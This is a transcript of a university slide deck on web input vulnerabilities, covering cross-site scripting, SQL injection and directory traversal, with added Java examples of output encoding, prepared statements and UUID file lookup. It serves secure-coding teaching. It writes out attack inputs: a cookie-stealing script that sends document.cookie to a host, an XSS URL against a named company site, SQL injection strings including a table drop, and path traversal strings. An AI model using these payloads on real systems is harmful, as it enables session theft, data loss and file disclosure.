Secure Software Engineering: Input Vulnerabilities - PowerPoint PPT Presentation
Provided by: eric144
Slides: 27

Transcript and Presenter's Notes

1
Secure Software Engineering: Input Vulnerabilities
  • CPSC 410

2
Input Vulnerabilities
  • We all know not to run code retrieved from
    suspicious places
  • But passive data may be interpreted as malicious
    instructions:

    System.out.println("/etc/password");

    vs.

    File file = new File("/etc/password");

3
3 Most Common Input Vulnerabilities on the Web
  • 1. Cross-site Scripting
  • 2. SQL Injection
  • 3. Directory Traversal
  • See http://www.owasp.com - the Open Web App
    Security Project

4
Cross Site Scripting
  • Web browsers should only execute JavaScript from
    sites that you visit
  • But Web sites often echo values given as input,
    e.g.
  • Input: http://www.foo.com?username=Eric
  • Output page: Hello Eric
  • If we put JavaScript into an input, an output
    page could include that JavaScript!
  • The tester must assume every data entry point is
    a possible XSS hole.

5
Example: Invectus on McDonald's

    http://www.mcdonalds.com/content/us/en/search/search_results.html?queryText=%22%3E%3Cimg%20src=%22http://i55.tinypic.com/witu7d.png%22%20height=%22650%22%20width=%221000%22%3E

URL-decoded, the queryText parameter is:

    "><img src="http://i55.tinypic.com/witu7d.png" height="650" width="1000">

Source: http://www.acunetix.com/blog/news/full-disclosure-high-profile-websites-xss/
6
(No Transcript)
7
Malicious Script Input
  • Basic example (assume URL encoding):

    http://www.foo.com?username=<script>alert("Hello World")</script>

  • Steal users' cookies:

    <script type='text/javascript'>
    var img = document.createElement('img');
    img.setAttribute('src', 'http://localhost:8080?cook=' + escape(document.cookie));
    document.body.appendChild(img);
    </script>

8
GWT vulnerabilities
  • JavaScript on your host page that is unrelated to
    GWT
  • Code you write that sets innerHTML on GWT Widget
    objects
  • Using the JSON API to parse untrusted strings
    (which ultimately calls JavaScript's eval
    function)
  • JavaScript Native Interface (JSNI) code that you
    write that does something unsafe (such as setting
    innerHTML, calling eval, writing directly to the
    document via document.write, etc.)

Source: https://developers.google.com/web-toolkit/articles/security_for_gwt_applications#xss
9
innerHTML example

    <html>
    <head>
    <script language="JavaScript">
    function fillMyDiv(newContent) {
      document.getElementById('mydiv').innerHTML = newContent;
    }
    </script>
    </head>
    <body>
    <p>Some text before mydiv.</p>
    <div id="mydiv"></div>
    <p>Some text after mydiv.</p>
    </body>
    </html>
10
GWT Guidelines
  • Carefully inspect and strip or escape any strings
    you assign to innerHTML using GWT code
  • Carefully inspect any JavaScript strings you pass
    to GWT's JSON parser
  • Carefully inspect any strings you pass to eval or
    assign to innerHTML via a JSNI method
  • Take care in your native JSNI methods to not do
    anything that would expose you to attacks

11
Cross Site Scripting
12
Famous Examples
  • Obama website redirected to Hillary Clinton
  • Twitter Pop-Ups
  • Invectus attacks (over 20 sites)

13
Best Solution
  • Filter any data which is echoed back into HTML
  • e.g.
  • http://josephoconnell.com/java/xss-html-filter/

    String input = request.getParameter("data");
    String clean = new HTMLInputFilter().filter(input);
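The following is an added example, not code from the slides or from the josephoconnell filter: a minimal HTML output encoder of the kind slide 13 calls for, applied at the point where a request value is echoed into the page. The same encoding is what the GWT guidelines on slide 10 ask for before a string is assigned to innerHTML. The class and method names (HtmlEncoder, encodeForHtml, greetingSafe) and the sample inputs are my own.

```java
// Added example (not from the slides): a minimal HTML output encoder.
// HtmlEncoder and its method names are assumptions of this example.
public final class HtmlEncoder {

    private HtmlEncoder() {}

    // Replaces the five characters that let data break out of an HTML text
    // node or a quoted attribute value. Everything else passes through.
    public static String encodeForHtml(String value) {
        if (value == null) {
            return "";
        }
        StringBuilder sb = new StringBuilder(value.length() + 16);
        for (int i = 0; i < value.length(); i++) {
            char c = value.charAt(i);
            switch (c) {
                case '&':  sb.append("&amp;");  break;
                case '<':  sb.append("&lt;");   break;
                case '>':  sb.append("&gt;");   break;
                case '"':  sb.append("&quot;"); break;
                case '\'': sb.append("&#39;");  break;  // &apos; is not defined in HTML 4
                default:   sb.append(c);
            }
        }
        return sb.toString();
    }

    // The "Hello <username>" page from slide 4, built both ways.
    public static String greetingUnsafe(String username) {
        return "<p>Hello " + username + "</p>";
    }

    public static String greetingSafe(String username) {
        return "<p>Hello " + encodeForHtml(username) + "</p>";
    }

    public static void main(String[] args) {
        // Constructed inputs standing in for request.getParameter("username");
        // the second and third have the payload shapes shown on slides 5 and 7.
        String[] samples = {
            "Eric",
            "<script>alert(\"Hello World\")</script>",
            "\"><img src=\"http://example.invalid/x.png\">"
        };
        for (String s : samples) {
            System.out.println("unsafe: " + greetingUnsafe(s));
            System.out.println("safe:   " + greetingSafe(s));
        }
    }
}
```

Encoding belongs at the output side: the same value may be safe in a log line and dangerous in an HTML attribute, so the encoder is chosen by where the data is written, not by where it came from. A whitelist filter such as HTMLInputFilter is the right tool when some markup must be allowed through; for plain text, full encoding as above is simpler to get right.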

14
Simple Web App
  • A Web form that allows the user to look up
    account details
  • Underneath a Java Web application serving the
    requests

15
SQL Injection Example
  • Happy-go-lucky SQL statement
  • Leads to SQL injection
  • One of the most common Web application
    vulnerabilities caused by lack of input
    validation
  • But how?
  • Typical way to construct a SQL query using string
    concatenation
  • Looks benign on the surface
  • But let's play with it a bit more

    String query = "SELECT Username, UserID, Password FROM Users WHERE "
                 + "username = '" + user + "' AND password = '" + password + "'";
16
Injecting Malicious Data (1)
Press Submit

    query = "SELECT Username, UserID, Password FROM Users WHERE Username = 'bob' AND Password = ''"

17
Injecting Malicious Data (2)
Press Submit

    query = "SELECT Username, UserID, Password FROM Users WHERE Username = 'bob'-- AND Password = ''"

18
Injecting Malicious Data (3)
Press Submit

    query = "SELECT Username, UserID, Password FROM Users WHERE Username = 'bob'; DROP Users;-- AND Password = ''"
19
Heart of the Issue: Tainted Input Data
[Diagram: a hacker sends evil input to the Web App; the application passes it on to the database (SQL injection) and echoes it as output to the browser (cross-site scripting).]
Insert input checking!
20
Bobby Tables
http://xkcd.com/327/
21
Mitigating SQL Injection
  • Always use Prepared Statements or Stored
    Procedures
  • Instead of

    stmt.execute("UPDATE EMPLOYEES SET SALARY = " + input1 + " WHERE ID = " + input2);

  • Use

    PreparedStatement pstmt = conn.prepareStatement(
        "UPDATE EMPLOYEES SET SALARY = ? WHERE ID = ?");
    pstmt.setBigDecimal(1, input1);
    pstmt.setInt(2, input2);

  • The account used to make the database connection
    must have least privilege. If the application
    only requires read access then the account must
    be given read access only.
  • Avoid disclosing error information: weak error
    handling is a great way for an attacker to
    profile SQL injection attacks.
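As an added example (not code from the slides), the login query of slides 15 to 18 written both ways, with the error-handling rule from slide 21 applied to the safe version. Table and column names are the ones on the slides; the class name UserLookup, the helper names and the assumption that the Connection was opened elsewhere with a read-only account are mine.

```java
import java.sql.Connection;
import java.sql.PreparedStatement;
import java.sql.ResultSet;
import java.sql.SQLException;
import java.sql.Statement;
import java.util.Optional;
import java.util.logging.Level;
import java.util.logging.Logger;

// Added example (not from the slides). The Connection is assumed to be
// opened elsewhere with a least-privilege (read-only) database account.
public final class UserLookup {

    private static final Logger LOG = Logger.getLogger(UserLookup.class.getName());

    private UserLookup() {}

    // Vulnerable: string concatenation, as on slide 15. The query text is
    // exposed as a String so the effect of a given input can be inspected.
    static String buildUnsafeQuery(String user, String password) {
        return "SELECT Username, UserID, Password FROM Users WHERE Username = '"
                + user + "' AND Password = '" + password + "'";
    }

    public static Optional<Integer> findUserIdUnsafe(Connection conn, String user, String password)
            throws SQLException {
        try (Statement stmt = conn.createStatement();
             ResultSet rs = stmt.executeQuery(buildUnsafeQuery(user, password))) {
            return rs.next() ? Optional.of(rs.getInt("UserID")) : Optional.empty();
        }
    }

    // Safe: the SQL text is fixed; user and password travel as parameters, so
    // a quote or "--" inside them is matched literally against the column.
    static final String LOGIN_SQL =
            "SELECT Username, UserID, Password FROM Users WHERE Username = ? AND Password = ?";

    public static Optional<Integer> findUserIdSafe(Connection conn, String user, String password)
            throws SQLException {
        try (PreparedStatement pstmt = conn.prepareStatement(LOGIN_SQL)) {
            pstmt.setString(1, user);
            pstmt.setString(2, password);
            try (ResultSet rs = pstmt.executeQuery()) {
                return rs.next() ? Optional.of(rs.getInt("UserID")) : Optional.empty();
            }
        }
    }

    // Slide 21: never hand the SQLException text to the browser. The detail
    // goes to the server log; the user sees one generic message either way.
    public static String loginMessage(Connection conn, String user, String password) {
        try {
            return findUserIdSafe(conn, user, password).isPresent()
                    ? "Login succeeded"
                    : "Login failed";
        } catch (SQLException e) {
            LOG.log(Level.SEVERE, "login query failed", e);  // details stay server-side
            return "Login failed";                           // no SQL state, no driver message
        }
    }

    public static void main(String[] args) {
        // Constructed inputs from slides 16 and 17 show how the unsafe query
        // text changes with the input, while the prepared text never does.
        System.out.println(buildUnsafeQuery("bob", ""));
        System.out.println(buildUnsafeQuery("bob'--", ""));
        System.out.println(LOGIN_SQL);
    }
}
```

The schema follows the slide, which compares the submitted password against the stored Password column directly; in a real application the column would hold a password hash and the comparison would happen in Java after the row is fetched, which also keeps the password value out of the query entirely.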

22
SQL injection on GWT
  • More a vulnerability of the RPC services
  • Could send arbitrary data to your datastore (once
    the JavaScript is de-obfuscated)
  • Also possible to do JDOQL injection
  • Use Query object and parameters instead of String
    syntax

    Query query = pm.newQuery(Employee.class);
    query.setFilter("lastName == lastNameParam");
    query.setOrdering("hireDate desc");
    query.declareParameters("String lastNameParam");
    List<Employee> results = (List<Employee>) query.execute("Smith");
    query.closeAll();
23
Recent Examples
  • On March 27, 2011, mysql.com, the official
    homepage for MySQL, was compromised
  • On June 1, 2011, LulzSec stole information from
    Sony PS3 users
  • In August 2011, "Hacker Steals User Records From
    Nokia Developer Site"

24
Directory/Path Traversal
  • Occurs when user input is used to create the path
    for reading a file on disk
  • http://myblog.com/view?photo=eric.jpg

    String file = request.getParameter("photo");
    new File("/images/" + file);

See https://www.owasp.org/index.php/Path_Traversal
25
Directory Traversal
  • Malicious input:
  • http://myblog.com/view?photo=../../../../../Windows/system.ini
  • Has been used to retrieve
  • web.xml files
  • Apache conf files
  • UNIX password files
  • Other example:
  • You let the user choose between different style
    templates and save the template filename in their
    profile

26
Example 2
  • http://some_site.com.br/get-files.jsp?file=report.pdf
  • http://some_site.com.br/get-page.php?home=aaa.html
  • In these examples it's possible to insert a
    malicious string as the variable parameter to
    access files located outside the web publish
    directory.
  • http://some_site.com.br/get-files?file=../../../../some dir/some file
  • http://some_site.com.br/../../../../some dir/some file

27
Best Solution
  • Don't construct file paths from user input
  • Understand how your web server handles file
    access.
  • Create a UUID (Universally Unique IDentifier)
    for each file and save it as a column with the data

    uuid = UUID.randomUUID().toString();
    File savedFile = new File(uuid);

  • Example database table for images:

    picID | picName | picDesc | picOwner | picFormat | uuid
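The following is an added example, not code from the slides: the design on this slide in Java, with the image table modelled by an in-memory map. The browser only ever sees an opaque picID; the UUID that names the file on disk comes from our own table, never from the request, so the traversal input of slide 25 has nothing to act on. A canonical-path check is included as a second line of defence for code that still has to accept a filename (the style-template case on slide 25). PhotoStore, its method names and the /images and /var/templates roots are assumptions of this example.

```java
import java.io.File;
import java.io.IOException;
import java.util.HashMap;
import java.util.Map;
import java.util.Optional;
import java.util.UUID;

// Added example (not from the slides). The two maps stand in for the
// picID/picName/uuid columns of the slide's image table.
public final class PhotoStore {

    private final File imageRoot;
    private final Map<Integer, String> uuidByPicId = new HashMap<>();
    private final Map<Integer, String> nameByPicId = new HashMap<>();
    private int nextPicId = 1;

    public PhotoStore(File imageRoot) {
        this.imageRoot = imageRoot;
    }

    // Upload path: the caller's filename is stored as metadata only (picName);
    // the file on disk is named by a fresh UUID, exactly as on the slide.
    public int save(String picName) {
        String uuid = UUID.randomUUID().toString();
        int picId = nextPicId++;
        uuidByPicId.put(picId, uuid);
        nameByPicId.put(picId, picName);
        // new File(imageRoot, uuid) is where the bytes would be written.
        return picId;
    }

    // Download path: the ?photo= parameter is parsed as an integer id and
    // looked up. "../../../../../Windows/system.ini" is not an integer and is
    // refused; an unknown id yields empty (a 404). No File is ever built
    // from the request string itself.
    public Optional<File> resolve(String photoParam) {
        final int picId;
        try {
            picId = Integer.parseInt(photoParam.trim());
        } catch (NumberFormatException e) {
            return Optional.empty();
        }
        String uuid = uuidByPicId.get(picId);
        return uuid == null ? Optional.empty() : Optional.of(new File(imageRoot, uuid));
    }

    // Defence in depth for code that must accept a filename (e.g. a template
    // name saved in the profile): canonicalise the result and insist it still
    // lies under the allowed root. Canonicalisation resolves ".." and symlinks.
    public static Optional<File> withinRoot(File root, String relativeName) throws IOException {
        String rootPath = root.getCanonicalPath();
        if (!rootPath.endsWith(File.separator)) {
            rootPath += File.separator;
        }
        File candidate = new File(root, relativeName);
        String candidatePath = candidate.getCanonicalPath();
        return candidatePath.startsWith(rootPath) ? Optional.of(candidate) : Optional.empty();
    }

    public static void main(String[] args) throws IOException {
        PhotoStore store = new PhotoStore(new File("/images"));
        int id = store.save("eric.jpg");
        // Constructed requests: a valid id, then the traversal input from slide 25.
        System.out.println(store.resolve(String.valueOf(id)));
        System.out.println(store.resolve("../../../../../Windows/system.ini"));
        // Template lookup by name: an ordinary name passes, a traversal does not.
        File templates = new File("/var/templates");
        System.out.println(withinRoot(templates, "default.css"));
        System.out.println(withinRoot(templates, "../../../../../Windows/system.ini"));
    }
}
```

The lookup-by-id design is the one the slide recommends and is preferable on its own; withinRoot is only for the cases where a filename genuinely has to be accepted, and it must be applied to the canonical path, since a plain string check on the raw input misses encoded or symlinked forms of "..".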
28
2 Rules to Remember
  • Always assume many users are malicious and want
    to break your software
  • Don't assume a Web site is always accessed
    through a normal Web browser
  • Famous last words: "I wrote the JavaScript so
    that this would never happen"